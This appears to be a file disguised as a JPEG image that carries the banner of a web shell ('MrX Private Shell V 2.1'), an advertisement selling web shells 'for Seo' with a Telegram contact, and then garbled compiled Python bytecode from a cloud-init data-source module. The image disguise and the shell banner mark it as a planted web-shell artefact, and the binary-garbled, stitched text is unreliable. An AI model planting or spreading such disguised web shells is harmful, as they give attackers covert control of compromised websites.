����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
a
ah�i� � @ s� d Z ddlZddlZddlZddlZddlZddlmZ ddlm Z m
Z
mZ ddlm
Z
mZ e�e�ZdZdd� Zeed �d
d�Zeje d�d
d�Zdd� Zdd� Zdd� Zdd� Zdd� ZG dd� de j�Zee j ffgZ!dd� Z"dS )zr
This file contains code used to gather the user data passed to an
instance on rootbox / hyperone cloud platforms
� N)�IPv4Address)�sources�subp�util)�
EventScope� EventTypez
/etc/hostsc C s. t jtdd�} | r t�d� dS t�d� dS )NT)�quietz5/etc/hosts exists - setting manage_etc_hosts to FalseFz=/etc/hosts does not exists - setting manage_etc_hosts to True)r �load_text_file� ETC_HOSTS�LOG�debug)�hosts� r �H/usr/lib/python3.9/site-packages/cloudinit/sources/DataSourceRbxCloud.py�get_manage_etc_hosts s
r )�inc�returnc C s t ttt| ��| ��S �N)�strr �int)�addrr r r r �increment_ip# s r )r c C s | t | d�t | d�gS )z�Return a list of 3 IP addresses: [addr, addr + 2, addr + 3]
@param addr: an object that is passed to IPvAddress
@return: list of strings
� � )r )r r r r �
get_three_ips'